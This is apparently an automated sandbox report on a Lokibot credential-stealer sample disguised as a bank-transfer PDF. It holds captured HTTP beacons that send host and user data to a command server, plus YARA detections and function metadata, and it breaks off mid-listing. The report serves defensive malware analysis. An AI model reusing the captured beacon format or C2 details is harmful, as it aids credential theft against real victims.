38	192.168.2.6	49744	91.142.77.45	80	C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Nov 3, 2022 12:31:45.577785969 CET	160	OUT	POST /gl21/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 79F54F54 Content-Length: 169 Connection: close
Nov 3, 2022 12:31:45.639533043 CET	160	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 3, 2022 12:31:47.249314070 CET	160	IN	HTTP/1.0 404 Not Found Date: Thu, 03 Nov 2022 11:31:46 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
39	192.168.2.6	49745	91.142.77.45	80	C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Nov 3, 2022 12:31:50.569101095 CET	161	OUT	POST /gl21/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 79F54F54 Content-Length: 169 Connection: close
Nov 3, 2022 12:31:50.631377935 CET	161	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 3, 2022 12:31:52.163666964 CET	162	IN	HTTP/1.0 404 Not Found Date: Thu, 03 Nov 2022 11:31:51 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.6	49710	91.142.77.45	80	C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Nov 3, 2022 12:30:18.297576904 CET	104	OUT	POST /gl21/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 79F54F54 Content-Length: 169 Connection: close
Nov 3, 2022 12:30:18.359889030 CET	104	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 3, 2022 12:30:18.666949987 CET	104	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 3, 2022 12:30:19.791138887 CET	104	IN	HTTP/1.0 404 Not Found Date: Thu, 03 Nov 2022 11:30:19 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.6	49711	91.142.77.45	80	C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Nov 3, 2022 12:30:20.264286041 CET	105	OUT	POST /gl21/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 79F54F54 Content-Length: 169 Connection: close
Nov 3, 2022 12:30:20.327415943 CET	106	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 3, 2022 12:30:21.541560888 CET	106	IN	HTTP/1.0 404 Not Found Date: Thu, 03 Nov 2022 11:30:21 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.6	49712	91.142.77.45	80	C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Nov 3, 2022 12:30:22.162497044 CET	107	OUT	POST /gl21/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 79F54F54 Content-Length: 169 Connection: close
Nov 3, 2022 12:30:22.224951029 CET	107	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 3, 2022 12:30:23.556931019 CET	107	IN	HTTP/1.0 404 Not Found Date: Thu, 03 Nov 2022 11:30:23 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.6	49713	91.142.77.45	80	C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Nov 3, 2022 12:30:25.414439917 CET	108	OUT	POST /gl21/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 79F54F54 Content-Length: 169 Connection: close
Nov 3, 2022 12:30:25.476478100 CET	108	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 3, 2022 12:30:26.998667002 CET	109	IN	HTTP/1.0 404 Not Found Date: Thu, 03 Nov 2022 11:30:26 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.6	49714	91.142.77.45	80	C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Nov 3, 2022 12:30:27.432236910 CET	110	OUT	POST /gl21/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 79F54F54 Content-Length: 169 Connection: close
Nov 3, 2022 12:30:27.493982077 CET	110	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 3, 2022 12:30:27.886517048 CET	110	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 3, 2022 12:30:28.386557102 CET	110	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 3, 2022 12:30:29.899760008 CET	111	IN	HTTP/1.0 404 Not Found Date: Thu, 03 Nov 2022 11:30:28 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.6	49715	91.142.77.45	80	C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Timestamp	kBytes transferred	Direction	Data
Nov 3, 2022 12:30:31.132672071 CET	111	OUT	POST /gl21/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: sempersim.su Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 79F54F54 Content-Length: 169 Connection: close
Nov 3, 2022 12:30:31.195020914 CET	112	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 34 00 30 00 35 00 34 00 36 00 34 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 Data Ascii: (ckav.ruengineer405464DESKTOP-716T77108F9C4E9C79A3B52B3F739430
Nov 3, 2022 12:30:32.611166954 CET	112	IN	HTTP/1.0 404 Not Found Date: Thu, 03 Nov 2022 11:30:32 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Status: 404 Not Found Content-Length: 23 Content-Type: text/html; charset=UTF-8 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Target ID:	0
Start time:	12:29:47
Start date:	03/11/2022
Path:	C:\Users\user\Desktop\transferencia bancaria.pdf.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\transferencia bancaria.pdf.exe
Imagebase:	0xf40000
File size:	811008 bytes
MD5 hash:	355EFB2E1F7DD361F8E7CDA449A45EAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.289674735.0000000003592000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Show Windows behavior

Target ID:	1
Start time:	12:29:59
Start date:	03/11/2022
Path:	C:\Users\user\Desktop\transferencia bancaria.pdf.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\transferencia bancaria.pdf.exe
Imagebase:	0x5f0000
File size:	811008 bytes
MD5 hash:	355EFB2E1F7DD361F8E7CDA449A45EAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000001.00000000.275125166.0000000000401000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000002.513741442.0000000000CF8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.275310547.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000000.275310547.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000000.275310547.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000001.00000000.275310547.0000000000415000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Execution Graph

Execution Coverage:	10.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	3.4%
Total number of Nodes:	87
Total number of Limit Nodes:	8

Executed Functions

Function 031A6CD0 Relevance: 1.5, Strings: 1, Instructions: 286
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

`Ql, xrefs: 031A6CF7

Memory Dump Source

Source File: 00000000.00000002.277619689.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a0000_transferencia bancaria.jbxd

Similarity

API ID:
String ID: `Ql
API String ID: 0-2088864798
Opcode ID: 2c4ee5c2f6c2c0d1cd93bf5c04e4114fdecdf5e179f271f28071e8fdde8bbfb2
Instruction ID: 48232a68e43296038bad330b2fd9b4358c9edf6ceb887847f2b40b7641d5be0b
Opcode Fuzzy Hash: 2c4ee5c2f6c2c0d1cd93bf5c04e4114fdecdf5e179f271f28071e8fdde8bbfb2
Instruction Fuzzy Hash: 95D11334E10619CBDB24DFA8C840BDDB7B2FF89305F6182A9D549BB250EB306A85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 031A484F Relevance: .3, Instructions: 285COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.277619689.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a0000_transferencia bancaria.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6854b299633bf7d808f20d1b11e7d246de59232e38bb0552422df8302c8e5f61
Instruction ID: aae2ed0ef4ab63f45413a17e40a1d2fee20b7d789405687bf72db19b5e49d64c
Opcode Fuzzy Hash: 6854b299633bf7d808f20d1b11e7d246de59232e38bb0552422df8302c8e5f61
Instruction Fuzzy Hash: 36B1292715C9C2EBC711D67E8C43996BBB0965F131B48C39692F08B7E2E7A2C452CB46

Uniqueness

Uniqueness Score: -1.00%

Function 031A3B98 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.277619689.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a0000_transferencia bancaria.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f28b98fd1eaafcfc60ed9455fd1f7dfa0b19e23a001444180cca7116c974e4f
Instruction ID: 8f36b4848297e641811ea6f927f54a755be5ba3ab8897776d11cafae44913c76
Opcode Fuzzy Hash: 2f28b98fd1eaafcfc60ed9455fd1f7dfa0b19e23a001444180cca7116c974e4f
Instruction Fuzzy Hash: 1ED11334E10219CBDB24DBA8C850BDDB7B2FF99301F6182A9D549BB350EB306A85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 031A6D23 Relevance: .3, Instructions: 273COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.277619689.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a0000_transferencia bancaria.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4df12ad0fcef5f0221100e220efa53c7c91e21eed7aaf78e17666e8a453d4911
Instruction ID: 7e247d06fb1514037e42a2dd102c8531d4f584ab0efb63378f92d70c11ab7dee
Opcode Fuzzy Hash: 4df12ad0fcef5f0221100e220efa53c7c91e21eed7aaf78e17666e8a453d4911
Instruction Fuzzy Hash: 6FD10334E10619CBDB24DBA8C840BDDB7B2FF99301F6182A9D549BB351EB306A85CF51

Uniqueness

Uniqueness Score: -1.00%

Function 031AC0E1 Relevance: 6.1, APIs: 4, Instructions: 125
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 031AC150
GetCurrentThread.KERNEL32 ref: 031AC18D
GetCurrentProcess.KERNEL32 ref: 031AC1CA
GetCurrentThreadId.KERNEL32 ref: 031AC223

Memory Dump Source

Source File: 00000000.00000002.277619689.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a0000_transferencia bancaria.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: d8378a1ac8aeb23e5cb3495ca1b98887c32514b29190ebea29ff4b771900a226
Instruction ID: 7ec16e6d37f9d1fa6b84422ccc6bd21693455cb4040153afad34c204843f4ce5
Opcode Fuzzy Hash: d8378a1ac8aeb23e5cb3495ca1b98887c32514b29190ebea29ff4b771900a226
Instruction Fuzzy Hash: FE5145B4A006498FDB10CFA9C548BDEBBF1FB88314F248459E419B7360D7349944CFA6

Uniqueness

Uniqueness Score: -1.00%

Function 031AC0F0 Relevance: 6.1, APIs: 4, Instructions: 120
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 031AC150
GetCurrentThread.KERNEL32 ref: 031AC18D
GetCurrentProcess.KERNEL32 ref: 031AC1CA
GetCurrentThreadId.KERNEL32 ref: 031AC223

Memory Dump Source

Source File: 00000000.00000002.277619689.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a0000_transferencia bancaria.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: b0dca8b228629f53ebec9cc3e1727159bbfe64d5babccf26c59b0cfb35d4d083
Instruction ID: 90f74a74ae7efb02d33a580c50b3623f06c57ae78b7978647bdb757c71f19378
Opcode Fuzzy Hash: b0dca8b228629f53ebec9cc3e1727159bbfe64d5babccf26c59b0cfb35d4d083
Instruction Fuzzy Hash: 085142B4A006498FDB14CFA9D948BDEBBF1FB88314F248459E419B7360D734A944CFA6

Uniqueness

Uniqueness Score: -1.00%

Function 031A9E08 Relevance: 1.7, APIs: 1, Instructions: 195
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 031AA04E

Memory Dump Source

Source File: 00000000.00000002.277619689.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a0000_transferencia bancaria.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: d2fbcd8a9b3bebbe01e2e3d97e4b96947622484a4291a71df20f65bb9f626e4b
Instruction ID: a2b2b7b0fc3c54449a54b170d8d198aa059ecc4982bb49f6c5b3fd16f4638275
Opcode Fuzzy Hash: d2fbcd8a9b3bebbe01e2e3d97e4b96947622484a4291a71df20f65bb9f626e4b
Instruction Fuzzy Hash: D67137B4A00B098FDB24DF2AC044B5ABBF5BF88215F04892DD54ADBB50D735E855CF91

Uniqueness

Uniqueness Score: -1.00%

Function 031A565D Relevance: 1.6, APIs: 1, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 031A5719

Memory Dump Source

Source File: 00000000.00000002.277619689.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a0000_transferencia bancaria.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 56e088bd1a9ddff054d71cfd54dbaa7b9530e454638048fad8fa92b96242882c
Instruction ID: 03a55378979b3367d581deb51275fa54732a0781a1877c73ecdfd48185f51540
Opcode Fuzzy Hash: 56e088bd1a9ddff054d71cfd54dbaa7b9530e454638048fad8fa92b96242882c
Instruction Fuzzy Hash: 2C4134B4C04A18CFDB24CFA9C884B8EBBB2BF89305F148069D548BB251DB756946CF91

Uniqueness

Uniqueness Score: -1.00%

Function 031A4198 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 031A5719

Memory Dump Source

Source File: 00000000.00000002.277619689.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a0000_transferencia bancaria.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: cce9a6c62aca7a5c4357e521f2ba19d45ab23a5a6fdc2a415592d639e8411010
Instruction ID: c5a62d73f6b67cf5a9e6e8f33d1d0ca8042b22f233bd0d4c92b259625d094f88
Opcode Fuzzy Hash: cce9a6c62aca7a5c4357e521f2ba19d45ab23a5a6fdc2a415592d639e8411010
Instruction Fuzzy Hash: F14121B4C04618CFDB24CFA9C884B8EFBB2BF89309F548069D508BB251DB746945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 031AC718 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 031AC7A7

Memory Dump Source

Source File: 00000000.00000002.277619689.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a0000_transferencia bancaria.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 42801ccdea6924ddaf7cace30ef6b5ce19cda96a6de4d244af8d80fda7073f15
Instruction ID: 0f7b9c499753045c43ba4a1c40adc2417b5ac593ca2b3f678cce75f372359fd6
Opcode Fuzzy Hash: 42801ccdea6924ddaf7cace30ef6b5ce19cda96a6de4d244af8d80fda7073f15
Instruction Fuzzy Hash: 3121E0B5D01248AFDB10CFAAD984ADEBBF5FB48324F14841AE915B7310C378A955CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 031AC720 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 031AC7A7

Memory Dump Source

Source File: 00000000.00000002.277619689.00000000031A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 031A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_31a0000_transferencia bancaria.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 681d86076cd0bb748edea73648c5b92dc80301f1e77527f325c00aa20baa0621
Instruction ID: 9e1407801b68f258a043c7462e7b7d1e3d312c7aece4c93dc8e7c761d3498f10
Opcode Fuzzy Hash: 681d86076cd0bb748edea73648c5b92dc80301f1e77527f325c00aa20baa0621
Instruction Fuzzy Hash: 4321C2B59012489FDB10CFAAD984ADEFBF8FB48324F14841AE915B7310D378A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 031A9188 Relevance: 1.6, APIs: 1, Instructions: 55
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,031AA0C9,00000800,00000000,00000000), ref: 031AA2DA

Memory Dump Source

